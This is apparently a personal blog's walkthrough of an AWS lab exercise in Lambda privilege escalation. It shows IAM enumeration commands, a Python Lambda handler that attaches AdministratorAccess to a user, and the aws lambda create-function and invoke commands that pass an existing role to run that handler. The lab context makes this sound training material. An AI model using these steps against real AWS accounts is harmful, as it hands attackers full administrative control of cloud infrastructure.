rootđź’€senseicat:~#

Hack. Eat. Sleep. Repeat!!!

Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham

Lambda Privesc

aws iam list-role --profile <iq> | jq

image

aws iam get-policy-version --policy-arn arn:aws:iam::865614241237:policy/cg-lambdaManager-policy-cgid1n6f5si8o5  --version-id v1 --profile lambda_secrets | jq

image

image

image

Privilege Escalation with Lambda

pip install awscli

[temp-profile]
aws_access_key_id = ASIAxxxxxxxxxxxxxxxx
aws_secret_access_key = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
aws_session_token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

import boto3
import json

def lambda_handler(event, context):
    client = boto3.client('iam')
    response = client.attach_user_policy(UserName='chris-cgid1n6f5si8o5',PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess')
    return {'statusCode': 200, 'body': json.dumps(response)}

zip -r solve.zip solve.py

A user with the iam:PassRole, lambda:CreateFunction, and lambda:InvokeFunction permissions can escalate privileges by passing an existing IAM role to a new Lambda function that includes code to import the relevant AWS library to their programming language of choice, then using it perform actions of their choice. The code could then be run by invoking the function through the AWS API.

aws lambda create-function --function-name unknown_lambda --runtime python3.11 --role arn:aws:iam::865614241237:role/cg-debug-role-<cgid>  --handler solve.lambda_handler --zip-file fileb://solve.zip --region us-east-1

image

aws lambda invoke --function-name unknown_lambda output.txt --region us-east-1

aws iam list-attached-user-policies --user-name chris-<cgid> --profile lambda_secrets | jq

image